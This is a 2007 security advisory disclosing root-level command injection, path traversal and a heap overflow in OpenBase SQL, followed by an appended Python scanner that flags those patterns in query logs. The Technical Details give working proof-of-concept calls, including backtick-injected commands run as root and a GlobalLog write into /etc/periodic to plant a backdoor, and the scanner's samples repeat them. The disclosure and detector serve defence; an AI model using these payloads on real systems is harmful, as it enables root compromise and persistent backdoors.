********************** Netragard, L.L.C Advisory **********************
Penetration Testing - Vulnerability Assessments - Web Application Security
Strategic Reconnaissance Team
------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."

[POSTING NOTICE]
--------------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents of
the advisory may be updated. The advisory can be found on the Netragard
website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com

[Advisory Information]
--------------------------------------------------------------------------
Contact               : Adriel T. Desautels
Researcher            : Kevin Finisterre
Advisory ID           : NETRAGARD-20070313
Product Name          : OpenBase SQL Relational Database
Product Version       : <= OpenBase 10.0.5 (All Platforms)
Vendor Name           : OpenBase International, Ltd.
Type of Vulnerability : Remote Buffer Overflow, Command injection
Effort                : Easy

[Product Description]
--------------------------------------------------------------------------
"For over a decade, the OpenBase family of products have been enabling some
of the most innovative business applications at work today. With thousands
of customers worldwide, OpenBase has become a brand that companies can rely
on. OpenBase customers include AT&T, Adobe Systems, Canon, Walt Disney,
First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image and
many other innovators worldwide."
-- http://openbase.com/home-Aboutus.html --

[Technical Summary]
--------------------------------------------------------------------------
Netragard's SNOsoft Research Team discovered two critical vulnerabilities
in the OpenBase SQL Relational Database that can lead to full system
compromise.

The first vulnerability is a command injection vulnerability that affects
several of the default Stored Procedures. Specifically, it is possible to
execute system commands as the root user by inserting a series of backticks
into the pre-defined Stored Procedures.

The second vulnerability is a Buffer Overflow that causes heap corruption.
This also has the potential to lead to the execution of arbitrary code or a
Denial of Service condition.

[Technical Details]
--------------------------------------------------------------------------
1. call AsciiBackup('\`id\`') results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages
OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd. All Rights Reserved.
Using database 'WOMovies' on host 'localhost'
Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an easy
backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600" , "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths
return_0
----------
Success
----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1> call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg; /usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths
return_0
----------
Failure
----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa... results in
zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx `","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`")
results in commands being run as root

An exploitable vulnerability exists in OpenBase that can be used to gain
NT AUTHORITY\SYSTEM or root privileges on an affected system. This
vulnerability exists in the usage of Stored Procedures. If a user creates a
procedure with an overly long name, OpenBase may crash due to memory
corruption. Memory may be corrupted in such a manner that an attacker can
run arbitrary shellcode of his or her choice.

[Proof Of Concept]
--------------------------------------------------------------------------
See Above

[Vendor Status]
--------------------------------------------------------------------------
Vendor Notified on 03/05/07
Vendor Patched on 03/09/07

Vendor has stated the following:
OpenBase now runs as the "openbase" user for security reasons. I would like
to publicly thank Kevin Finisterre for his input.

[Disclaimer]
------------------------http://www.netragard.com--------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to help
the I.T. community protect themselves against a potentially dangerous
security hole. This advisory is not an attempt to solicit business.
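As an added defender-side example, not part of the Netragard advisory, the following Python scans query-log lines for the three patterns the Technical Details section describes: backticks in arguments to the affected stored procedures, path traversal in the GlobalLog target, and the overlong identifiers behind the heap corruption. The procedure names come from the advisory; the one-statement-per-line log format, the sample lines and the 64-character identifier threshold are assumptions.

```python
import re

# Stored procedures the advisory names as affected by backtick injection.
AFFECTED_PROCS = {"AsciiBackup", "GlobalLog", "OEMLicenseInstall"}
# Assumed threshold for an "overly long" identifier; tune for your schema.
MAX_IDENT_LEN = 64

CALL_RE = re.compile(r"\bcall\s+(\w+)\s*\((.*)\)", re.IGNORECASE | re.DOTALL)
IDENT_RE = re.compile(r"\b(?:select|from)\s+([A-Za-z_]\w*)", re.IGNORECASE)


def classify_statement(stmt):
    """Return a list of findings for one SQL statement (empty if clean)."""
    findings = []
    m = CALL_RE.search(stmt)
    if m:
        proc, args = m.group(1), m.group(2)
        # Backticks inside a procedure argument are the injection marker.
        if proc in AFFECTED_PROCS and "`" in args:
            findings.append(f"backtick in argument to {proc}")
        # GlobalLog writes a root-owned file at the caller-chosen path.
        if proc == "GlobalLog" and "../" in args:
            findings.append("path traversal in GlobalLog target")
    # Overlong table/column names trigger the zone_free() corruption.
    for ident in IDENT_RE.findall(stmt):
        if len(ident) > MAX_IDENT_LEN:
            findings.append(f"overlong identifier ({len(ident)} chars)")
    return findings


def scan_log(lines):
    """Scan query-log lines; return [(line_no, findings)] for flagged lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        findings = classify_statement(line)
        if findings:
            hits.append((n, findings))
    return hits


# Constructed sample lines (assumed one statement per log line).
SAMPLE_LOG = [
    "call AsciiBackup('nightly')",
    "call AsciiBackup('`id`')",
    'call GlobalLog("../../../../../../etc/periodic/daily/600", "\\nx\\n")',
    "select title from movies",
    "select " + "a" * 200 + " from " + "a" * 200,
    'call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`", "k", "k", "k")',
]

if __name__ == "__main__":
    for line_no, findings in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {'; '.join(findings)}")
```

Feed it the ISQL statement log (or a proxy capture) and alert on any hit; after the vendor fix the server runs as "openbase" rather than root, but the injection itself is still worth detecting on unpatched hosts.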